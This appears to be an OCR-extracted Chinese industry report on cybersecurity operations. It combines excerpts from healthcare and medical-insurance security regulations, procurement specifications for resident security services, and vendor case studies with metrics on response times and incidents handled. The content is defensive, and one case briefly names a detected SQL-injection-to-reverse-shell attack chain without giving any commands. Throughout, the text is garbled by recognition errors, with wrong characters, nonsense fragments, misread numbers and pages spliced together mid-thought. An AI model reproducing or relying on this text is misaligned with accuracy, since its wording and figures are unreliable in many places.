业务建设的驱动力,实现“体系合规、常态保护,实战有效”的效果 第一,将以往经验式运维调整为针对学校业务风险针对性部署安全策略; 第二,强化学校网络防御基线检测,改变传统被动防御形式,加强高级攻击的检测能 力 ; 第三,基于威胁可视性和运维自动化技术缓解当前阶段普遍存在的滞后式安全事件响 应行为,提升学校日常安全运营效率。 *第二条:坚持积极防御,综合防护。充分利用人工智能、大数据分析等技术,强化安全监测、态势感知、通报预警和应急处置等重点工作,落实网络安全保护“实战化、 体系化、常态化”和“动态防御、主动防御、纵深防御、精准防护、整体防控、联防联控”的“三化六防”措施。 ◆第七条:各医疗卫生机构应依托国家网络安全信息通报机制,加强本单位网络安全通报预警力量建设。鼓励三级医院探索态势感知平台建设,及时收集。汇总,分析各 方网络安全信息,加强威胁情报工作,组织开展网络安全威胁分析和态势研判,及时通报预警和处置,防止网络被破坏、数据外泄等事件。 ◆第 九 条 :各医疗卫生机构在网络运营过程中,应每年开展文档核验,漏洞扫描、渗透测试等多种形式的安全自查,及时发现可能存在的问题和隐患。针对安全自查,监 测预警、安全通报等过程中发现的安全隐患应认真开展整改加固,防止网络带病运行,并按要求将安全自查整改情况报上级卫生健康行政部门。自查整改可与等级测评 问题整改一并实施。 ◆第二十六条;各级卫生健康行政部门应建立网络安全事件通报工作机制,及时通报网络安全事件。 ◆第三十条:各医疗卫生机构应保障开展网络安全等级测评、风险评估、攻防演练竞赛、安全建设整改、安全保护平台建设、密码保障系统建设、运维、教育培训等经费 投入。新建信息化项目的网络安全预算不低于项目总预算的5% 《国家医疗保障局关于进一步深化推进医保信息化标准化工作的通知》医保发〔2022〕8号 ◆各级医保部门要强化网络和数据安全组织须导,压实安全责任,统筹工作部署,建立健全网络和数据安全保护规章制度。加强网络安全智能预警能力建设,实时监测系 统运行情况,提升安全威胁信息汇集和研判能力,加强网络和数据安全防护信息共享和递报预警。推进安全运营管理队伍建设,强化日常监管,开展常态化医保数据安 全专项检查,做好安全风险处置演练,做好重大活动期间安全保情,加快形成责任明确、层级清晰、保嶂有力的安全运营管理体系。 《国家医疗保障局关于加强网络安全和数据保护工作的指导意见》医保发[2021]23号 ◆到2022年,基本建成基础强、技术优、制度全、责任明、管理严的医疗保障网络安全和数据安全保护工作体制机制。到“十四五”期末,医疗保障系统网络安全和数据 安全保护制度体系更加健全,智慧医保和安全医保建设达到新水平。 ◆网络安全水平显著提升。主体责任明晰,监督管理机制完善,基础设施完备,网络安全技术能力。态势感知、预警能力、突发网络安全事件应急响应能力显著提 升,网络安全有效保障。 ◆数据安全管理有效实施。数据安全审批制度全面建立,分级分类管理及重要数据保护目录全面落实,数据实现全生命周期安全管理,数据安全评估机制日益完善。 ◆加强网络安全和数据保护“实战化、体系化、常态化”和“动态防御、主动防御、纵深防御、精准防护、整体防控、联防联控”的“三化六防”措施,推进金国医疗保 障信息系统网络安全和数据保护态势感知,预誓能力建设。加强网络安全和数据保护信息的汇集、研判,建立健全网络安全和数据保护信息共享和通报机制,健全完善 上下协同的通报预警机制。 疾控核心业务系统始建于2003年,至今已建立起完善的国家,省 市、县、乡镇用户管理体系,先后建设了用户认证与授权管理系统, 基本信息。基础编码。公共卫生数据交换服务平台等多个应用支撑系 统,逐步完善了信息安全管理机制。2009年做了网络直报系统迁移 改造,2019年启动了全民健康信息化保障项目疾控信息系统建设。 已运行的核心业务应用系统覆盖全国各级各类医疗卫生机构,授权用 户32.5万多人,系统要求7x24服务不中断稳定运行,同时建成了疾 捏中心本级及十一个直属单位的协同办公平台和各省级疾控中心节点。 根据国家信息安全等级保护要求,Xx疾病预防控制中心现有系统中的 xx控制信息系统、协同办公平台等为网络安全等级保护三级系统,中 心网站、公共卫生数据共享网站等为网络安全等级保护二级系统。 项目建设目标 供应商需配合xx疾控中心,按照《网络安全法》、《个人信息保护 法》、《网络安全等级保护要求》,《关键基础设施保护条例》及 《数据安全法》等国家法律法规相关要求,完善现有数据中心的安全 运维管理,为xx疾控中心提供专业技术人员驻场,开展系统安全保障 服务.态势感知平台驻场运维服务,国家重大节假日及xx疾控中心重 大活动安全保障服务、攻防演练技术支撑服务、二线专家咨询服务、 企业版防病毒运维服务、非法外联监控服务、安全培训服务。 提供合同期内5×8小时1名人员驻场服务(国家重大节偶日及xx疾控中心重大活动支全保障除外),协动 采购人进行网络和信息安全管理,网络与安全设备安全配置策略维护、病毒查杀,安全设备运行状态 检查,故障处置等事项,并对全年运维服务进行总结,编制《驻场安全运维服务总结》。 安全巡检服务 漏洞扫描服务 日志分析服务 应急响应服务 协助等保测评服务 互联网监控服务 堡垒机运营服务 态势感知平合运营驻场服务 提供合同期内5*8小时1名安全运营人员驻场服务(国家重大节假日及xx疾控中心重大活动安全保障除 外),针对采购人现有的态势感知平台提供安全运维管理服务,包括;日常巡检,平台运行状态监控, 系统升级、规则管理。知识库升级等工作内容、基础安全运营服务和二线专家技术支撑服务。依托态 势感知平台开展资产管理。漏洞管理。威胁分析。预警通知等工作,通过持续开展运营工作可掌握数 据中心的资产情况,及时发现面临的内外部威胁风险等。 资产管理 漏洞管理 告警监控分析 威胁分析 预警通知 日志解析 联动处置 二线专家技术支撑 国家重大节假日及XX疾控中心重大活动安全保障服务 国家重大节假日、xx疾控中心重大活动以及中心业务需要的重要信息安全保障时间内(不少于40天) 需增派驻场工程师不少于1人,进行7x24小时驻场服务,协助采购人开展需要进行重点安全保障的任 务,开展监控预警工作,及时处理各类信息安全事件,确保信息系统安全稳足运行。 攻防演蔬枝木支撑服务 按照采购人攻防演练需求,协助采购人制定攻防演练工作方案,合理安排人员组差攻防技术团队,梳 理安全错施有效性,排查安全风险和加固整改,组织攻防演练预演,以及在攻防演练过程中所需求的 必要人员,技术支撑,安全检测等服务,演练结束后对演练效果进行总结并编写演练总结报告。 xx医院是国家卫生健康委员会直属医院,始建于1984年。现编制床位近 2000张,集医疗、教学、科研、康复和预防保健等多项功能为一体,并 承担中央保健医疗康复任务,国家卫生应急救援队任务,同时还是国家卫 生计生委远程医疗管理与培训中心。 为更好地履行维护网络安全、意识形态安全和国家安全的使命,按照xx 市和卫建委相关要求,开展网络安全服务建设工作,全面加强院内办公网 络、信息系统的安全性,保障院内信息系统的安全稳定运行,提升医院整 体安全防护水平。在安全运营建设过程中引入数据安全治理工作,保障医 院数据的完整性、保密性、可用性。 项目内容 随着xx医院信息化业务的快速发展,业务系统日益复杂,业务关联性和 架构复杂性。信息资产和数据总量逐渐增多,需要不断优化和提高安全能 力,建立起持续运营的安全运营体系,从业务系统安全的角度出发,保障 业务活动安全稳定。 乙方需结合甲方实际现状开展为期3年的安全运营体系建设与服务工作 使甲方具备在资产管理,检测与防护,威胁分析与响应,防御策略优化、 威胁情报等方面具备相关能力,乙方需为甲方设计为期3年的安全运营体 系建设规划。 同时在安全运营建设过程中引入数据安全治理工作,实现数据资产梳理、 数据分类分级规范制定、数据分类分级策略,数据分类分级标识等。 根据国家医保局《全国医疗保障系统核心业务区骨干网络建设指南》(医保 网信办[2019]40号)和《xx 省丢行保障局xx省政务服务数据管理局关于 开展Xx省医疗保障系统核心业务联网工作的通知》(X医保函[2020)106 号)的要求,经过前期建设,省医保专网在2021年已初步建立。省医保专 网采用树形网络结构,纵向由各级医疗保障部门按垂直的上下级模式连接 成广域骨干网络,由国家医保局连接各省级医保局,并向下覆盖到市、县 镇级医疗保障部门;横向以各级医疗保障部门为中心向同级信息资源共享部 门辐射,并与医院,药店等相关单位连接,形成该级的城域接入网。针对省医保信息平台核心业务骨干网络的安全性和医疗保障数据防护要求,按照国家医保局“安全分区,网终专用,横向隔离、纵向认证”的原则, 进一步完蕃纵向骨干网络结构安全,本体安全及基础设施安全,从终端安 全、网络安全逐步提升省医保信息平台安全防护和安全运营能力。为满足 国家医疗保障局对医疗保险信息平台的安全要求,本项目将协同省政务云 平台居疗保障核心业务区共同构建云端-网端-终端的安全体系,推进省医 保信息平台网络安全保护恐势感知。预雪能力建设。由省政务云平台混件 云端安全保峰,本项目提供终端和网端的自下而上的安全防护服务,实现 省医保专网的安全防护和接入终端安全,同时通过安全运营服务,构建一 套“技术先进,安全可靠,服务完备”的用户方安全运营体系,完全具备 “威胁预警,协同对抗,可管可控”的安全运营保障能力,落实常态化的 持续风险监控分析运维,结合省医保局的业务及防护能力情况进行7*24小 时风险分析运营,避免发生安全事件产生重大影响。 型品设而挥要要求 专业基础设施租赁服务 根据《国家医疗保磁局关千印发加强网络安全和故据保护工作指导意见的追如)》的网络 安全指导意见,建立井完善省医保专网网络安全能力和接入终端安全保障,为省医保专 网省节点相售基于NFV.SDN、ATT&CK新型威胁分析、知识图谱和攻击链威胁分析及 智能编排等新型技术的网络安全能力池。 日 区 距 齐 常 终端接入安全监控系统 (2套、网络层吞吐量3G) 下一代防火墙系统 (1套、网络层吞吐量3G) 网络入侵防御系统 (1套、网络层者吐量3G) 网络防病毒系纸 (1套、网络层春吐量3G) 日法审计系统 (1套,150日志源。 5000EPS) 全流显攻击溯源-文件监测 系统 (1套、10万文件/天) 全流量攻击溯意-流量分析 系统 (1套、检测能力36) 全流里攻击湖意-威胁关联 分析系统 (1套、检测能力3G) 蛮瓶及欺骗统一管理系统 (1套) 集中预酱展示系统 (1套.10000EP5) 一键威胁处置系统 (1套) 资产集中管理系统 (7套) 威胁情报分析系统(1套) 运行维护服务要求 针对所租赁的专业基础设施提供合同服务期限内3年免费维保服务(投标报价需包含相关费用),以确保安全基础设施稳 定运行。具体包括设备故障保修、设备巡检、软件补丁、辅助故障定位等服务。 安全运首服务 安全规则/功能优化 日常实时安全监控 恶意攻击封堵处置 失陷事件专项排查 安全鼠勖预警及恶意样本摘获分析 重大活动保障专项策略调优溪习协助 终端已知病毒查杀服务 终端新型病毒查杀服势 网络安全可视化服务 总体要求 数据与接口要求;本项目部署网络安全能力平台,采用私有云方式部署,网络安全能力平台采用虚拟化软件服务。为确 保数据安全,网络安全能力平台与医保网络采用专线互联,并接入至现有的医保网络中,实现与医保网络核心区域的数 据牵引、流量牵引和安全防护,井根据业务需求,输出业务所需要的外部数据和接口。 吞吐量要求;本项目规模涉及整个医保信息平台、服务参保人数共1.08亿。日均医保结算量120+万笔。需满足省级 100个机构接入终端及支持21地市2万接入数量终端的流量分析。满足省医保专网50个网络设备及安全能力的日志分析。 深信服科技股份有限公司成立于2000年,是专注于企业级网络安全、云计算、T 基础设施及物联网的产品和服务供应商,致力于让每个用户的数字化更简单、更安全。目 前深信服在全球设有50余个分支机构,员工规模超过9000名。 深信服安全托管服务 (MSS) 通过云端安全运营平台和安全专家团队有效协同的“人机共智”模式,提升组织安全风险管控能力和安全工作效果,为用户提供持续、有效、 省心、便捷的安全托管服务, 一同构建7*24小时持续守护、有效预防和主动闭环的体系化安全运营能力。 项目介绍 项目亮点 ●页目背最 国家法律法规及行业监管要求明确要求邮政企业、快递企业应当按照国家网络安 全等级保护制度的要求履行安全保护义务。随着攻防演练、安全监督检查的常态 化,集团网络安全风险管理面临巨大挑战,曾发生多次安全事件并受到上级监管 通报。 ◆害户痛点 1、同络架构复杂,同能安全管通响:大型物流企业业务体系庞大,分支公司众 多。复杂的网络架构、繁多的资产、有限的时间精力让网络安全工作极具难度; 2、缺少壹业运曾人才,研判响应毒后:安全设备本身的配置和管理需要持续开 展,企业缺乏专业人才,分析研判、响应处置能力不足,疲于被动响应; 3、攻击手法持集升最,建以对抗实战:企业对外业务系统多,暴露面大,而外 部攻击手法持续升级变化,企业对新型威胁的检测处置不及时、难闭环,处于 “攻防不对等”状态。 ◆方案设计 摒弃以往“缺人招人、缺设备买设备”的高投入、效果无法保障的安全建设方式, 某物流企业选择与第三方专业安全厂商——深信服合作,选择以提升“安全效果” 为导向的安全运营方案,导入MSS+SIP+STA+SAA5 XDR(订阅)+EDR的云网端安 全运营解决方案。 ◆真目亮点: 在使用MSS期间在日常运营,威胁监测、攻击对抗多方面实现了安全效果的大幅提升,通过 MS5从不间歇的风险管控,实现风险“可知、可控、可管“。 1、7*24小时真守护,平均10分钟宪成应急响应:两年服务期间内,主动响应并处置多起夜 间攻击事件,平均响应时间10分钟。上线SaaSXDR及MSS 2个月后,帮助客户发现了一起 “SQL注入-dnslog域名访问-外联下载bash-反弹shell-执行命令”事件,信息中心联动深信 服安全运营中心,10分钟内还原整个攻击过程并完成应急响应,阻断攻击,处置闭环效率显 著提升。 2、实成能力大概提升,防守成放优异: 在多次重要时期、大型攻防演练的真攻 真防下,MSS云端专家团队 和信息中心默契协作,共同77 坚守下,没有任何一起攻击 成功突破安全防线,最终取 得了优异的防守成绩。 ◆项目背景: A银行为我国大型城市商业银行之一,随着网络安全逐年建设,A银行已完成基础架构安全建设, 全运营过程中,依然有以下突出问题待解决: 1、安全设备种类多,日均告繁上亿条,缺乏有效监测手段,安全事件难发现; 2、安全团队初建,人员能力不足,缺乏梯队建设,安全能力难以持续提升; 3、全工作没有整体规划设计,依赖个人经验和外部厂商能力,执行效果难保障; 4、安全工作涉及多个部门,依赖人工推动处置,效率低,处置难,风险长期暴露; 5、安全建设投入周期长,缺乏有效的量化评价手段,安全成效难凸显。 ◆建设方案: 通过安全运营中心建设,构建云地协同、平战结合安全运营体系,实现A银行安全运营工作规范开 可管控,并借助有效性验证与运营优化,持续提升安全运营能力。 云端 家 云题力A 但是在日常安 展,安全风险 ◆项目亮点: 1、从无到有构建态势底如做力,按心区筑监测100%覆盖 基于智能安全运营平台10000+检测规则,千万级病毒库,实现威 胁集中监测,覆盖银行两地三中心三十余个安全区,安全风险一屏 概览。 2、签于典位定内开展人才培养,提升国队实成化重力 完成安全运营团队岗位架构及安全人员能力梯队设计(含5类运营岗 位,3级运营专家),并基于岗位要求开展安全培训,构建实战化运 营团队。 3、特续提升自动化能力,实现分钟级成除检测与响应 贴合客户业务配置30多个50AR剧本,实现威胁自动处置。封堵平 均时间由建设之初的1.2小时下降至3分钟,整体MTTD降低至15分 钟内。 4、执行执果量化可差,避营成果直观量观 构建核心度量指标,结合安全运营成熟度评估与实战攻防演练,持续 牵引安全运营建设,安全运营成熟度已提升至3级充分定义级别。 ◆春户价值: ·安全运营管理能力显著提升,实现安全风险可管可控,常态化到战 时平稳切换。 ·威胁事件监测、处置能力显著提升,MTTD由以天为单位缩短至15 分钟内,MTTR由48小时以上缩短至12小时内。 安恒信息成立于2007年,于2019年登陆科创板。安恒信息秉承”构建安全可信的数字世界“的企业使命,以数字经济的安全基石为企业定位,形成了云安全、大数据安 全、物联网安全、智慧城市安全、工业控制系统安全及工业互联网安全五大市场战略,作为国家级核心安保单位,参与了近乎国家全部重大活动的网络安全保隆工作,实现零 失误。2020年11月23日,安恒信息正式成为杭州第19届亚运会网络安全类官方合作伙伴,这也是国际大型综合性赛事网络信息安全类最高层级合作。 安恒信息安全托管运营服务(简称; MSS) 正式发布于2022年6月,目前拥有四个安全托管中心(杭州、北京、广州、西安),13个联合运营中心,为全国的政府、教育、 医疗、企业、金融用户提供MSS 安全托管运营服务。◆需求背录 XX市人民医院作为一家三甲医院,仅有运维人员,无法从专业视角分析海量的设备告警,安 全设备始终无法发挥出全部价值。在发生安全事件时,缺乏及时有效的处置手段,无法确保事 件均能闭环。自2023年起,医院再次加强对网络安全方面的投入,以增设态势感知平台+安全 服务人员的方式提升安全水平。 ◆建设方素 1)部署态势感知平台,对接云端安 全运营中心,全网流量及安全日志实 现统一汇集分析; 2)部署资产与漏洞管理平台,持续 开展资产与漏洞管理,安全检查工作 常态化开展; 3)引入外部安全服务专家服务, 7*24小时实时进行威胁监测与响应。 ◆首月成果 1)责产与滑肾渠度管理:完成院内资产发现,梳理并录入资产与漏洞 管理平台主机资产、域名资产、WEB资产共计5000余项、资产指纹信息 24000余条(其中新增待确认主机资产400余台,WEB资产42项)。 2)鼻 文击面管理:针对互联网资产:发现存在十余项高危指纹, 协助收敛暴露面&攻击面并修复7个高危漏洞;针对内网资产,通过周期 开展漏洞管理工作,共处置240余个高中危漏洞。 3)安全事件快意响应闭环;发现并通报处理17起安全事件,包括3次紧 急安全事件(挖矿病毒横向扩散、勒索病毒域名恶意通信、境外IP登录 院内系统),均成功拦截并进行安全加固。 4)自动化处置助力安全防护;完成8项响应剧本的编写与有效性验证, 利用设备自动化处置能力有效提高了安全处置时效。 ◆春户背景; 某中国500强上市公司是一家集制造、产品定制、产业互联网等为一 体的国际化企业,产业分布在中国、美国、加拿大、英国、日本等 多个国家。 ◆客户骨求: 【需求一】利用360在互联周侧的能力 1.对企业部署在互联网侧的资产和业务进行梳理,找出非该企业的 信息资产,特别是仿冒的网站及APP,同时协助企业对仿冒资产进 行举报。 2.对互联网资产的漏洞进行排查,找出高危漏洞,并协助信息部门 对漏洞进行修复。 3.对暴露在公共平台上与该企业相关的数据及暗网平台上涉及买卖 该企业数据的行为进行排查。 4.对企业网站进行保护,防止网站被篡改。 【需求二】利用360的安全大数据和工叠师能力 1.对办公网的攻击行为进行7×24小时监测,并协助客户完成威胁的 处置。 2.对办公网的资产进行梳理,对漏洞进行排查,并协助信息部门对 漏洞进行修复。 ◆服务成果: 1.威胁事件发现率提高80%。 1PE+*GESAA 2.事件响应时间从30分钟降低到 5分钟,业务流转效率提升500%。 3.事件研判时间从120分钟降低 至20分钟,研判分析效率提升 500%。 4.事件处置事件从96小时降低至 24小时,处置效率提升300%。 ◆项目优势; 360数字安全运营服务基于360 安全云在全网能力,运营平台、 轻量探针、专家团队四大要素的 优势,以及近20年积累的安全服 务能力和攻防实战经验,帮助企 业构建集合精准发现、及时响应、 快速止损的一体化数字安全运营 服务,真正做到为安全效果买单。 腾讯安全作为互联网安全领先品牌,致力于成为产业数字化升级进程中的安全战略官。2023年,基于全球1500位C5O 实战总结,腾讯提出了一套以“发展驱动”为核心 的数字安全免疫力模型,助力客户构建数字安全体系,守护企业生命线! 腾讯5OC+ 智能安全运营与管理体系充分融合情报、攻防、管理与规划四大能力矩阵,包含NDR.SOC、 威胁情报、安全数据湖四大产品矩阵,从安全形态、安全价值、 安全思维等战略视角,更全面的审视安全问题,有效解决制约SOC建设过程中的诸多瓶颈问题。 项 目 介 绍 ◆客户业务诉求 近年通过实战攻防演练的方式来发现企业安全漏洞,提升企业安全防护能力的形式已经成为常规手段。企业也能够在对抗中不断适应多种攻击手段,升级自身防护能力,并在最终的复 盘中对攻击行动中的防御体系的识别、加固、检测、处置等各个环节进行审视,发现薄弱位置并进行优化。 该金融企业也是通过每年至少两次的实战化演练来促进网络安全建设。之前由于互联网暴露面还未完全收敛导致有部分高危组件对互联同开放,成为了防护的短板,通过实战化的演练 发现问题,加速互联网暴露面收敛工作,通过把高危组件收缩至零信任网关,从而减少攻击面。 ◆客户效果自述 基于企业对于安全建设工作的向基层落实以及安全能力的整体提升的需求,腾讯的安全运营中心可以建设集团化SOC方案,将其安全曾理的能力输出并接入到企业安全建设流程中, 通过集中集团的网络安全日志进行安全数据和信息集中统一管理、场景建设及事件闭环。 我们企业在安全运营能力建设方面有了更大的能力提升。我们企业本身业务范 围比较广,包括投资银行。证券交易,融资租赁等等,同时也在积极地推进数字化 建设,为客户提供更多样化,优质化的金融服务,这么多元的业务场景其实对自身 的安全运营和管理也提出了挑战。 腾讯在安全给出体系(50C+智能安全运营与管理体系),能够道过预测,防 御、检测和响应实现安全事件的闭环,这跟我们企业的“主动响应和闭环”的安全 工作理念是比较符合的。在实际落地过程中,腾讯的这套体系也有效帮助到我们的 安全运营方面建设,特别是安全运营中心、安全编排自动化平台。 除此之外,腾讯安全做的一些关于AIT&CK 的前沿技术研究,其实也给我们企 业的攻防能力带来了启发和参考,同时以产品的形态让企业能够轻松地接入一些前 沿的安全能力,真正帮助企业提升自身的安全水位。 通过腾讯的专家对安全运营深刻的认识,来建设丰富的安全场景,展现安全态 势,从而帮助公司提高威胁检测能力,加快响应速度,赋能我们企业数字化能力。 北京安信天行科技有限公司成立于2009年,是国内知名的网络安全综合解决方案提供商。公司致力于为用户创造安全可信的网络空间,以提供专业的网络安全服务为核 心,为政务、卫生、纪检、教育、广电、企业等各领域数字化建设保驾护航,并在北京奥运会、冬奥会、国庆70周年、建党100周年等国家重大活动保障以及首都网络安全运 营保障工作中发挥了重要作用。 项目介绍 项目亮点 《 中 有 重 每 口 永评在评补 4 的 重 他 置 通 重 一、业务需求 用户通过购买服务方式选择多家云服务商提供为辖区各机关单位云资源服务, 多云建设模式也对主管机构政务云服务质量和应用效能管理提出了新的课题。 二、解决方案 1、创新管理模式 建立第三方监督、评价管理模式,健全政务云运营管理制度和技术规范体系。 2、资重统一管理 搭建政务云运营门户,实现对政务云资源的申请、开通、监控、变更、计费 的一体化管理。 3、安全综合监管 搭建安全综合管理平台,实现对政务云日常运维、安全监测和应急处置等方 面的全方位监管。 4、监督考被评价 综合线上实时监测数据和线下定期检查数据,考核云服务商服务服务质量, 评价使用单位应用效能。 三、成效价值 1、实现政务云资源、运维、安全、应急的一体管理; 2、提升了政务云服务质量和运营管理水平; 3、为云服务商考核审计、使用单位效能评价提供决策依据。 南京众智维信息科技有限公司位于金陵南京,是以国内知名的麒麟安全实验室(原OPENX 实验室)为基础建立的新一代人工智能+机器学习驱动的网络安全运营解决方案 商,拥有20+发明专利,50+软件著作权。公司深耕AISecOps赛道,将机器学习、自然语言处理和深度算法学习等技术应用于企业缴、城市级安金道营,重保对次,协同作读 等场景,目前已与200+高质量客户达成合作与签约,覆盖金融、政务、运营商、能源、军工等行业龙头客户。 需求背景 1.IT规模复杂且安全设备异构,1W+ 台安全设备及上百万台生产服务器。 2.长期面临合规及红蓝实战,承受重保期间现场600+作战人员管理压力。 3.日常安全事件处置过度依赖人工,重保对抗期间强度大、时间长。 4.企业安全网格、云化成熟,管理者对网络安全运营实战化发展定位明确。 ◆建设方案 ◆方案价值 1.构建企业级安全运营中台管理+网格运营化,摆脱安全“孤岛”困局。 2.全自动完成运营/重保场景下企业90%以上任务,降本增效显著。 3.全程Al辅助MTTR/MTTD考核,贯穿人-产品-流程实现重保“0”失分。 4.实现大规模企业级安全运营300+编排流程、600+人员、上百万IT资产。 ◆方案成效 山东星维九州安全技术有限公司是以MSS\MDR (托管式安全服务)为核心业务方向的新型网络安全服务商和安全运营服务装备供应商,结合国内客户需求及业务特点, 打破传统安全的纯产品交付模式,以安全数据不离场的方式帮助客户建立基于持续监测的安全运营体系以应对动态威胁。目前已接入大中小200余家远程服务客户,为客户监 测业务数量26000+,监测IP数量11000+,日监测发现安全漏洞500+,累计监测发现漏洞421472个。星维安全运营中心依托中心侧安全运营支撑平台SOSS 体系与客户现场侧 前哨服务系统,通过安全运营分析用例、安全运营剧本、标准化运营流程调度一二三线安全运营分析师,以安全数据不离场的方式帮助客户完成资产安全治理、暴露面分析、 威胁管理服务、脆弱性管理服务等标准化安全服务工作。 项目介绍 用户收益 ◆需求背景 X X 集 团 作 为 一 家 地 方 性 的 大 型 国 有 企 业 , 近 年 来 一 直 致 力 于 数 字 化 转 型 , 作 为 支 撑 数 字 化 建 设 的 关 键 基 座 , 网 络 安 全 建设是数字化转型的必由之路 , 目前企业网络安全方面存在以下短板 : 一是尚未建立动态信息资产管控机制 。 二是缺少 统一安全监测预警和处置响应能力 , 缺少网络安全统一指挥和决策调度 , 难以及时发现处理出现的安全事件 。 三是网络 ◆近营成果 1)资产与暴露面管理 资产管理10次,运营期间共计下线业务系统21 个,上线业务系统24个,最新运营资产为196 个 2)脆弱性闭环管理 弱密码管理6次,共计发现2个业务系统存在弱 密码账号59个,已全部完成整改;进行漏洞管 理6次,共计修复高可利用漏洞81个, 一般漏洞 5个,剩余3B个高可利用漏洞和42个一般漏洞 修复中。 3)威胁闭环管理 内外部威胁管理共计10006次。外部威胁分析 进行9547次攻击对抗,策略调优6次,累计永 久封锁恶意攻击源70次;内部威胁分析处置 489次,隔离处置恶意病毒16起,信任文件27 起,运营期间累计阻断恶意外连行为446起。 攻击日益频繁,单靠自身力量难以形成全面防护,需协同多方力量共同应对 ◆建设方素 1)威胁管理运营服务(MDR)。包含威胁监测、事件分 析与处置、安全机制有效性验证等服务内容,为用户 提供持续性整体风险管理服务; 2)脆弱性管理运营服务(MVA)。包含攻击面管理 (ASM)服务、专项安全测试、专家安全测试、业务 」 安全监测及安全意识评估等服务,通过不同服务的组 合,针对性的提供有效的脆弱性管理能力; 3)安全运营支撑服务。通过引入安全运营服务网关、 资产探测、热点漏洞扫描等安全运营支撑工具,辅助 安全运营工作的闭环管理。 教擦不重场的安全运警 声 件 日志易是国家级专精特新“小巨人”企业,国内领先的日志管理与分析平台开发商,基于自研搜索引擎Beaver 和搜索处理语言SPL 推出SIEM 安全大数据分析平台、数据工 厂(安全数据治理)、日志审计一体机、SIEM、UEBA、SOAR、 安全态势大屏等安全系列产品,实现安全分析、威胁检测与响应。用户异常行为分析以及态势感知等场景, 已服务金融、能源、运营商等重点行业近1000家大型机构。 项目介绍 项目亮点 某银行是国内最大的股份制银行之一,交易数据量大,并具有高度敏感性和价值性,对于网络安 全、数据安全的重视程度远高于其他行业,其信息化建设的先进度也走在国内前列。日志易安全 SOC运营中心作为行内唯一的安全运营中枢,帮助其实现了多种安全设备数据源的实时检测分析, 以及跨不同来源关联分析挖掘潜在威胁的能力,建设以来为客户实现了护网0通报。同时,项目经 验也成功复制到国内多个大型金融机构,形成了完善的安全运营平台及配套运营服务解决方案。 *0s* *** ** □ 4 t · 监测:通过SIEM进行威胁检测,实时发现威胁,并与威胁情报平台(TIP)进行关联,提高告警精准 度 ; · 分析:通过从NDR以及EDR对安全事件展开取证分析,确认,追腙可疑攻击以及异常行为; ·响应:以SOAR为驱动,联动阻断设备/系统(抗D/边界防火增/WAF/AD/堡垒机),对发现的安全 事件进行响应(封禁IP/锁定账户/其他) ·自研搜豪引擎:PB级存储搜索,100亿级别日志量秒级搜素。 ·数据解析能力行业领先:支持数百种数据源自动解析接入,内置数十种解析 引擎,对于非内置解析规则的全新数据源做到快速解析。 ·Flink规则引犟:分钟级创建并启用新监控规则。 ·SPL规则引擎:对标5plunk,300多种函数、指令,支持复杂检测模型构建, 大时间跨度数据分析。 ·丰窗完善的成胁将猪功能:网络层取证、端点层取证、攻击链、时间线、溯 源分析等。 ·数干个规则模型沉淀,数十个成熟SOAR剧本,帮助用户一站式解决从威胁 检测到响应的各种难题。 ·信创国产替代:国内最接近Splunk的国产化替换产品,信通院唯一认证信创 日志分析平台,已实施多个落地案例,无缝替换,更符合国内用户使用习惯。 使用前 使用后 每天人工搜累攻击次数较将多所全设备的告警结合威胁情报进行分析, 数个 |P查询成胁情报后处置,延 并运用目动化剧本处置, 一分钟内处置完。 只能关注高危的漏洞攻击事件。 可以实现所有等级安全事件的分类处置。 精力有限,选取个别比较所任有入设备数据都整合在SIEM平台上,只 设备数据进行查看。 需关注SIEM平台即可学握全局安全情况。 每天2,3千条告警量,根本不 可能每条核查, 通过SIEM对告普聚合、关联规则,告警量下降 至数十祭甚至更少。 长扬科技(北京)股份有限公司是一家国资监管下、市场化运作,专注于工业互联网安全、工控网络安全和工业互联网+安全生产的国家高新技术企业,公司以信创安全操 作系统为安全底座,以工业安全靶场为能力提升手段,自主研发了近百款产品,构建工业互联网安全产业完整生命周期的集团级工业网络安全保障体系,广泛服务于电力、石 油石化,轨道交通、城市市政、智能制造、钢铁冶金。教育等行业超过4000+家工业企业,满足等保2.0及关键信息基础设施安全保护条例要求。 项目介绍 项目亮点 某集团是以肥料、精细化工,新材料为主业的国有综合产业集团,长扬科技为其构建工控安全主动防御运 营体系,落实集团网络安全制度要求,加强工控资产合规管理,实现基于网络安全态势感知的持续监控和分 析,为集团及下属企业构建一个全局的、实时的、可预测的网络安全运营体系,全面提升集团的工控网络和 信息网络的安全威胁监测感知与应急处置能力,让网络攻击和安全威胁无处遁形。 ◆解决方案; 1、安全规划方面,围绕集团和首批13家下属企业,依据“总体规划,分步实施、技霄并重、适度防护”原则, 深入一线调研,制定集团总体工控安全建设规划,工控安全集团标准,避免下属企业重复建设,投资溴费; 2.解决方案层面,通过技术、营理,运曹三者结合,打造满足等保、分类分级。关保等监管要求,井通过持 续运营,为智慧工厂的长期稳定发展保驾护航。 摸清家高认清风险 加强集团工业网络安全集中管控能力,全面梳理集团下属企业的 关键信息基础设施工控系统资产现状,查找安金漏洞,排查安全 隐患与风险,切实增强工控系统网络安全管理水平及防护能力, 提升了集团对全局工控系统资产和信息安全风险的管理水平。 乳果防舞联防联控 增强各企业对工业控制系统网络行为的合规性识别能力,切实提 升集团工控系统安全检测与预警能力。实现工控网络安全风险实 时感知、威胁精准研判,提升了集团网络安全整体防护水平。井 通过内外部多级联防联动技术,提升了集团工控及网络安全应急 响应与处置能力。 安全漏营库低安全成胁 通过构建集团级纵深防御与监测预警能力体系,有效改进工控资 产管理手段,提高了工控网络安全运维与运营水平,有效的降低 了网络攻击给企业带来的安全威胁和经济损失。 行业标杆护款集团成为保障辙食安全的国家队 本项目对全国化工行业,全省众多企业将起到良好的带头示范作 用,引领行业进步,促进相关标准的推进。制订的企业标准规范 填补了省化工行业工控安全防护企业标准的空白,其考核标准更 具有科学性,集团的工业互联网安全保障体系可护航集团公司发 展成为保障粮食安全的“国家队” 安全运营领域法律法规健全、政策利好明显,企业开始重视井推进安全运营体系规划与建设,安全运营已成为网安产业发展的重要方向。 ◆近五年,国内安全运营市场快速发展,典型安全运营产品和安全运营服务过去五年市场复合增长率分别超过50%和70%,特别在最近三年特殊 时期,安全运营市场表现出强劲逆势高增长态势,在整体网安市场发展中起到了非常显著的带动作用。 ◆安全运营需求增长推动安全运营技术发展与进步,目前海内外公认、成熟的安全运营类技术已多达二十余种,在这些技术中,有一些是针对传 统能力的升级,有一些则是拓展了新的安全视角,从实际项目来看,这些技术已经逐步被客户接受,实际应用程度在快速上升。 